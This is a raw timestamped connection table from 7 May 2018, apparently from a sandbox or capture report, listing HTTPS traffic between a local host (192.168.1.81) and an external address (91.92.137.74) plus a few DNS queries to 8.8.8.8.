Mai 7, 2018 14:49:53.644864082 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.690891981 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.690924883 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.690931082 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.690937042 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.690943956 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.690949917 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.690968037 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.690973997 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.691006899 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.691034079 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.691047907 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.691258907 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.691325903 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.691669941 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.691785097 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.728300095 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728332043 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728349924 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728378057 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728389978 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728396893 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728425980 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728450060 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728482962 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728499889 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728538036 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.728781939 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.728822947 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.729146004 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.729260921 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.769251108 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769294024 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769314051 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769330025 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769344091 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769361973 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769399881 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769417048 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769429922 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769445896 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769462109 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.769674063 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.769706011 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.770011902 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.770096064 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.811321020 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811359882 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811378002 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811395884 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811413050 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811429977 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811472893 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811491013 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811507940 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811525106 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811541080 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.811955929 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.812026978 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.812336922 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.812463999 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.856477022 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856518030 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856537104 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856554031 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856570005 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856585979 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856620073 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856638908 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856654882 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856671095 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.856687069 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.857059002 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.857085943 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.857376099 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.857461929 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.898400068 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898417950 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898427010 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898437023 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898447037 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898456097 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898475885 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898484945 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898493052 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898499012 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898505926 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898684978 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.898714066 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.898977995 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.899068117 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.933890104 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.933921099 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.933938026 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.933954000 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.933968067 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.933983088 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.934032917 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.934048891 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.934062004 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.934077978 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.934094906 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.934166908 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.934190989 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.934828997 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.975362062 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975390911 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975413084 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975431919 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975450039 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975467920 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975534916 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975554943 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975572109 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975589991 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975613117 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.975728035 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.975815058 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.976135969 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.976272106 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.017394066 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017425060 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017440081 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017455101 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017469883 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017489910 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017529011 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017541885 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017586946 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017605066 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017617941 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.017788887 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.017868042 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.018203020 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.018316031 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.051266909 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051306009 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051323891 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051337957 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051351070 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051363945 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051399946 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051414013 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051434994 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051448107 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051460028 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051486015 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.051517963 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.051964045 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.080727100 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080754995 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080771923 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080782890 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080794096 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080806017 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080832005 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080843925 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080854893 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080866098 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.080876112 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.081202984 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.081245899 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.081315994 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.081872940 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.093236923 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.113390923 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113408089 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113413095 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113420010 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113425016 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113430023 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113447905 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113461018 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113486052 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113493919 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113508940 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.113915920 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.113965988 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.114372015 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.147380114 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147403955 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147411108 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147418022 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147433043 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147443056 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147466898 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147476912 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147485971 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147495031 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147502899 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.147567987 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.147607088 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.151290894 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.170958042 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171022892 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171041012 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171055079 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171067953 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171092987 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171134949 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171152115 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171178102 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171204090 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171201944 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.171221972 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171247005 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.171684980 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.204014063 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204034090 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204041958 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204049110 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204070091 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204080105 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204101086 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204109907 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204118013 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204124928 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204133034 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.204498053 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.221975088 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.221999884 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.222067118 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.236031055 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236047029 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236057997 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236068010 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236078024 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236089945 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236121893 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236133099 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236143112 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236154079 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236164093 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236263990 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.236291885 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.236521006 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.237157106 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.327577114 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327615023 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327642918 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327656984 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327670097 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327685118 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327728033 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327743053 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327758074 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327771902 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.327796936 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.328093052 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.328119040 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.328367949 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.329133034 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.450129986 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450149059 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450156927 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450164080 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450171947 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450179100 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450201035 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450208902 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450217962 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450225115 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450232029 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450582981 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.450606108 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.450865984 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.450937033 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.553405046 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553430080 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553446054 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553459883 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553473949 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553488016 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553513050 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553527117 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553539038 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553553104 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553566933 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.553756952 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.553781033 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.554011106 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.554476976 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.612673044 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612704992 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612716913 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612725019 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612735033 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612741947 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612776995 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612792015 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612803936 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612817049 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612828970 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.612880945 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.612925053 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.613523006 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.698668003 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698709965 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698735952 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698749065 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698760986 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698775053 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698812962 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698828936 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698842049 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698853970 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.698867083 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.699132919 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.699177980 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.699539900 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.699651003 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.810642004 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810676098 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810688019 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810697079 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810705900 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810714006 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810735941 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810745001 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810753107 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810760021 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.810766935 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.811119080 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.811151028 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.811446905 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.811532974 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.923261881 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.923312902 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.923319101 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.923341990 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.923351049 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.923356056 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.923361063 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.923633099 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.923666000 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:54.924761057 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.925628901 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:54.925736904 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:57.409387112 MESZ4991253192.168.1.818.8.8.8
Mai 7, 2018 14:49:57.457447052 MESZ53499128.8.8.8192.168.1.81
Mai 7, 2018 14:49:57.499145985 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:57.499203920 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:57.499639034 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:57.620915890 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:57.620966911 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:58.977372885 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:58.977400064 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:58.977407932 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:58.977464914 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:58.980299950 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:58.981456995 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:58.981486082 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:58.982093096 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:58.982142925 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:59.590126991 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:59.604815960 MESZ6299353192.168.1.818.8.8.8
Mai 7, 2018 14:49:59.627000093 MESZ4434916591.92.137.74192.168.1.81
